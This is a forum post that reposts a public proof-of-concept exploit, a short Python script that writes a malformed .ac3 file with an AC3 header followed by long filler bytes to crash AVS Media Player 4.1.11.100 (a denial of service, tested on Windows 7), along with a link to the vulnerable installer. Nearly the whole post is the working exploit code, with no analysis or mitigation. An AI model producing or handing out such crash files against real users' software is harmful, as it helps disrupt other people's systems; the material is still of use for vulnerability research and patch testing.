Jump to content
Matt

AVS Media Player 4.1.11.100 (.ac3) - Denial of Service

Recommended Posts

Posted

Author : metacom

Source : AVS Media Player 4.1.11.100 (.ac3) - Denial of Service

Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/44cd3f96f572b1c4288fcdbfc1aa2093-AVSMediaPlayer.exe

Code :

#!/usr/bin/python
print """
[+]Exploit Title:AVS Media Player(.ac3)Denial of Service Exploit
[+]Vulnerable Product:4.1.11.100
[+]Download Product:http://www.avs4you.com/de/downloads.aspx
[+]All AVS4YOU Software has problems with format .ac3
[+]Date: 29.06.2013
[+]Exploit Author: metacom
[+]RST
[+]Tested on: Windows 7
"""

buffer=(
"\x0B\x77\x3E\x68\x50\x40\x43\xE1\x06\xA0\xB9"
"\x65\xFF\x3A\xBE\x7C\xF9\xF3\xE7\xCF\x9F\x3E"
)

junk = "\x41" * 5000
bob = "\x42" * 100

exploit = buffer+ junk + bob

try:
rst= open("exploit.ac3",'w')
rst.write(exploit)
rst.close()
print("\nExploit file created!\n")
except:
print "Error"

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...